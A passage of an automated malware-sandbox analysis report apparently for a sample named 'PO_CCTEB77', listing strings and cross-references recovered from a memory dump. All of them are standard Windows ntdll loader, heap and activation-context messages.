                                                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01832506
                                                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01832602
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                            • API String ID: 0-4009184096
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                            • API String ID: 0-2515994595
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                            • API String ID: 0-3197712848
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                            • API String ID: 0-1700792311
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI$MZER
                                                                            • API String ID: 0-664215390
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • HandleTraces, xrefs: 01848C8F
                                                                            • VerifierDlls, xrefs: 01848CBD
                                                                            • VerifierFlags, xrefs: 01848C50
                                                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01848A3D
                                                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01848A67
                                                                            • AVRF: -*- final list of providers -*- , xrefs: 01848B8F
                                                                            • VerifierDebug, xrefs: 01848CA5
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                            • API String ID: 0-3223716464
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • LdrpGenericExceptionFilter, xrefs: 01844DFC
                                                                            • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 01844DF5
                                                                            • LdrpProtectedCopyMemory, xrefs: 01844DF4
                                                                            • minkernel\ntdll\ldrutil.c, xrefs: 01844E06
                                                                            • Execute '.cxr %p' to dump context, xrefs: 01844EB1
                                                                            • ***Exception thrown within loader***, xrefs: 01844E27
                                                                            • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 01844E38
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                            • API String ID: 0-2973941816
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                            • API String ID: 0-1109411897
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-792281065
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • LdrpInitShimEngine, xrefs: 018199F4, 01819A07, 01819A30
                                                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01819A2A
                                                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01819A01
                                                                            • apphelp.dll, xrefs: 017B6496
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01819A11, 01819A3A
                                                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 018199ED
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-204845295
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • SXS: %s() passed the empty activation context, xrefs: 01832165
                                                                            • RtlGetAssemblyStorageRoot, xrefs: 01832160, 0183219A, 018321BA
                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018321BF
                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01832180
                                                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0183219F
                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01832178
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                            • API String ID: 0-861424205
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • LdrpInitializeImportRedirection, xrefs: 01838177, 018381EB
                                                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 018381E5
                                                                            • Loading import redirection DLL: '%wZ', xrefs: 01838170
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 017FC6C3
                                                                            • LdrpInitializeProcess, xrefs: 017FC6C4
                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01838181, 018381F5
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                            • API String ID: 0-475462383
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 01802DF0: LdrInitializeThunk.NTDLL ref: 01802DFA
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01800BA3
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01800BB6
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01800D60
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01800D74
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 1404860816-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                            • API String ID: 0-379654539
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 017F855E
                                                                            • @, xrefs: 017F8591
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 017F8421
                                                                            • LdrpInitializeProcess, xrefs: 017F8422
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-1918872054
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018321D9, 018322B1
                                                                            • SXS: %s() passed the empty activation context, xrefs: 018321DE
                                                                            • .Local, xrefs: 017F28D8
                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018322B6
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                            • API String ID: 0-1239276146
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • RtlDeactivateActivationContext, xrefs: 01833425, 01833432, 01833451
                                                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0183342A
                                                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01833437
                                                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01833456
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                            • API String ID: 0-1245972979
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018210AE
                                                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01821028
                                                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01820FE5
                                                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0182106B
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                            • API String ID: 0-1468400865
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0183362F
                                                                            • LdrpFindDllActivationContext, xrefs: 01833636, 01833662
                                                                            • minkernel\ntdll\ldrsnap.c, xrefs: 01833640, 0183366C
                                                                            • Querying the active activation context failed with status 0x%08lx, xrefs: 0183365C
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                            • API String ID: 0-3779518884
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0182A992
                                                                            • apphelp.dll, xrefs: 017E2462
                                                                            • LdrpDynamicShimModule, xrefs: 0182A998
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0182A9A2
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-176724104
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 017D327D
                                                                            • HEAP: , xrefs: 017D3264
                                                                            • HEAP[%wZ]: , xrefs: 017D3255
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                            • API String ID: 0-617086771
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 0-4253913091
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $@
                                                                            • API String ID: 0-1077428164
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: FilterFullPath$UseFilter$\??\
                                                                            • API String ID: 0-2779062949
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • LdrpCheckModule, xrefs: 0182A117
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0182A121
                                                                            • Failed to allocated memory for shimmed module list, xrefs: 0182A10F
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-161242083
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 0-1334570610
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 018382DE
                                                                            • Failed to reallocate the system dirs string !, xrefs: 018382D7
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 018382E8
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-1783798831
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • @, xrefs: 0187C1F1
                                                                            • PreferredUILanguages, xrefs: 0187C212
                                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0187C1C5
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                            • API String ID: 0-2968386058
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                            • API String ID: 0-1373925480
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01844888
                                                                            • LdrpCheckRedirection, xrefs: 0184488F
                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01844899
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                            • API String ID: 0-3154609507
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 0-2558761708
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • LdrpInitializationFailure, xrefs: 018420FA
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01842104
                                                                            • Process initialization failed with status 0x%08lx, xrefs: 018420F3
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-2986994758
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: #%u
                                                                            • API String ID: 48624451-232158463
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • LdrResSearchResource Enter, xrefs: 017CAA13
                                                                            • LdrResSearchResource Exit, xrefs: 017CAA25
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                            • API String ID: 0-4066393604
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: `$`
                                                                            • API String ID: 0-197956300
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: Legacy$UEFI
                                                                            • API String ID: 2994545307-634100481
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$MUI
                                                                            • API String ID: 0-17815947
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • kLsE, xrefs: 017C0540
                                                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 017C063D
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                            • API String ID: 0-2547482624
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 017CA309
                                                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 017CA2FB
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                            • API String ID: 0-2876891731
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: Cleanup Group$Threadpool!
                                                                            • API String ID: 2994545307-4008356553
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: MUI
                                                                            • API String ID: 0-1339004836
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
